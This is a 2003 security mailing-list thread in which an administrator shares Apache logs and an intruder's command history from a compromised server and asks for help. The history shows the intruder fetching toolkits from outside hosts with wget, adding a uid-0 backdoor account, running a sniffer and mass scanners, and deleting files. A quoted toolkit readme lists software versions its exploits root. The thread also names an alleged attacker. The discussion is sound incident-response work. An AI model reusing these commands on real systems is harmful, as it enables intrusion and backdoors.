quote from "boom.tar.gz" (see if you find somethin' that sounds familiar): WARNING, this is a powerfull tool you can gain root access on many systems. Use it at your own risk. It scans for vulnerabilities in different OS and daemons: The BIND scan: Gains root access on all nonpatched boxes running linux with the following bind versions: ISC BIND 8.2 ISC BIND 8.2.1 ISC BIND 8.2.2 ISC BIND 8.2.2-P3 ISC BIND 8.2.2-P5 ISC BIND 8.2.2-P7 The LPD scan: Gains root access on all nonpatched boxes running linux RedHat 7.0 with lpd from distribution. The FTPD scan: Gains root access on all nonpatched boxes running the following OS/ftp daemons: Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm] Debian potato [wu-ftpd_2.6.0-3.deb] Debian potato [wu-ftpd_2.6.0-5.1.deb] Debian potato [wu-ftpd_2.6.0-5.3.deb] Debian sid [wu-ftpd_2.6.1-5_i386.deb] Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm] Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm] Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm] Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm] Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm] RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm] RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm] RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm] RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm] RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm] RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm] RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm] RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm] SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm] SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm] SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm] SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm] SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm] SuSE 7.0 [wuftpd.rpm] SuSE 7.0 wu-2.4.2 [wuftpd.rpm] SuSE 7.1 [wuftpd.rpm] SuSE 7.1 wu-2.4.2 [wuftpd.rpm] SuSE 7.2 [wuftpd.rpm] SuSE 7.2 wu-2.4.2 [wuftpd.rpm] SuSE 7.3 [wuftpd.rpm] SuSE 7.3 wu-2.4.2 [wuftpd.rpm] Slackware 7.1 The SSHD scan: Gains root access on all nonpatched boxes running the followin versions: Linux: SSH-1.5-1.2.25 SSH-1.5-1.2.26 SSH-1.5-1.2.27 SSH-1.5-1.2.30 SSH-1.5-1.2.31 SSH-1.99-OpenSSH_2.2.0p1 SSH-1.5-OpenSSH-1.2 SSH-1.5-OpenSSH-1.2.2 SSH-1.5-OpenSSH-1.2.3 OpenBSD 3.x: OpenSSH 2.9.9 - 33 The RPC scan: Gains root access on multiple RPC vulnerabilities involving Linus/SunOS/Solaris. The TELNED scan: Gains root access on all nonpatched boxes running the following OS's: Most of the BSD OS's The POP3 scan: Gains root access on all nonpatched boxes running QPOP 3.0b For further upgrades send me new exploits at k1net1c@k1net1c.net The SSL scan: Gains access on almost all linux boxes running OpenSSL 0.9.6d and older. Spawns a shell uid=apache. ----- Original Message ----- From: "Radu Voicu" To: "Marco Lum" ; "suse-security" Sent: Wednesday, September 03, 2003 7:53 PM Subject: Re: [suse-security] Apache Gain Remote Shell Access

curiosity kills the cat:

http://www.vulturul.org/ = A romanian guy, 18years old, his name is Brisan Andrei :)

----- Original Message ----- From: "Marco Lum" To: "suse-security" Sent: Wednesday, September 03, 2003 7:43 PM Subject: [suse-security] Apache Gain Remote Shell Access

...

Help, Help, Somebody help!!!

I Found somebody gain access using wwwrun, Download programs and try to hack into other server.

Follows found in error_log of apache

--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]

0K ......... 100% 13.69 KB/s

09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]

bind: Address already in use bind: Address already in use --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz => `bin.tar.gz' Resolving geocities.com... done. Connecting to geocities.com[66.218.77.68]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,748 [application/x-gzip]

0K .......... ......... 100% 65.37 KB/s

09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]

sh: line 1: ./bin.tar.gz: Permission denied

gzip: stdin: not in gzip format tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out => `a.out' Resolving 195.174.78.202... done. Connecting to 195.174.78.202:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13,444 [text/plain]

0K .......... ... 100% 3.37 KB/s

15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]

sh: line 1: ./a.out: Permission denied chmod: invalid mode string: `x' sh: line 1: ./a.out: Permission denied Bad syntax, perhaps a bogus '-'?

sh: line 1: cd: /tmp/vulturu: No such file or directory --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]

0K ......... 100% 13.67 KB/s

20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]

tar: Error exit delayed from previous errors

sh: line 1: cd: /tmp/": No such file or directory

Also Found his command history:

id /usr/sbin/adduser vulturul -u0 -g0 -M; cd /usr/local/games/ ls -ax wget www.vulturul.org/vulturul/bnc.tgz cd /tmp/" " socklist killall -9 nsl ls -ax rm -rf epcs2 rm -rf ns rm -rf nsl rm -rf p rm -rf pk ls -ax wget www.vulturul.org/vulturul/bnc.tgz tar xvfz bnc.tgz mv psybnc "~. " cd "~. " mv psybnc " " export PATH=:PATH ./" " id ls --color ./li ls --color ./p exec ./p 8003 id pwd cd .. cd .. ls -ax ls -ax --color rm -rf edu.gz rm -rf local.tar.gz rm -rf local cd 3du ls --colorls --color ./scan 200.13.230.37 ./scan 200.13.230.37 -d 6 ./scan 202.30.198.226 -d 6 /scan 202.186.250.157 ./scan ./scan 202.186.250.157 ./scan 202.186.250.157 -d 6 ./scan 64.106.104.84 -d 6 ./scan 64.106.104.84 -d 6 ./scan 128.119.213.136 -d 2 d .. cd .. ls -ax cd atd ls -ax ./osslmass2 mass.log ./osslmass2 mass.log cd ../atd ls -ax cd .. ls -ax --color pico ./pico mv pico /usr/bin pico ls -ax mv pico /usr/bin cp pico /usr/bin/pico cd 3du ls -ax --color cd .. wget http://geocities.com/supers7ar/boom.tar.gz tar xvfz boom.tar.gz cd boom ls -ax ./r00t./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2 ./r00t -t 193.231.142 -d 4 ./r00t -t 193.231.142 -d 7 ./r00t -t 193.231.142 -d 8 cd .. pwd wget http://geocities.com/supers7ar/sshup.tar.gz tar xvfz sshup.tar.gz cd ssh-3.0.1/ ls -ax cd .. rm -rf ssh-3.0.1/ rm -rf sshup.tar.gz ls -ax --color rm -rf boom.tar.gz cd ~. cd " ~.

q

q

}

q

exit

ls -ax wget www.vulturul.org/vulturul/linsniffer chmod +x linsniffer ./linsniffer ls -ax rm -rf linsniffer ls -ax --color id ./heh

./r00t -t 128.100.20 -d 8 ./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2

./scan 200.13.230.37

Please help, I Can't found where he can get in~~!

-- Marco Lum Net Service Manager

____________________________________________________________________________

_______________

...

System Development Service Inter/Intra/Local-Area Networking Service

VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com

HK Service Company HK Service Consultants Limited

-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here

-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here

Checked, No Root access gen. No CGI ACCESS - No log in access_log No Shell Access by wwwrun Play back his history, root access cannot be done BTW, what the hell "raver" Stefan Andreas Tichy wrote:

On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:

...

Follows found in error_log of apache

--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]

0K ......... 100% 13.69 KB/s

09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]

Wget output in apache error_log. Check for a CGI (shell script?) allowing clients to execute arbitrary commands.

...

Also Found his command history:

id /usr/sbin/adduser vulturul -u0 -g0 -M;

He has root access but is not shure about that?

At least two problems. Execution of commands as user wwwrun and local root compromise.

I hope the box has been disconnectet from the network already.

-- Marco Lum Net Service Manager ___________________________________________________________________________________________ System Development Service Inter/Intra/Local-Area Networking Service VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com HK Service Company HK Service Consultants Limited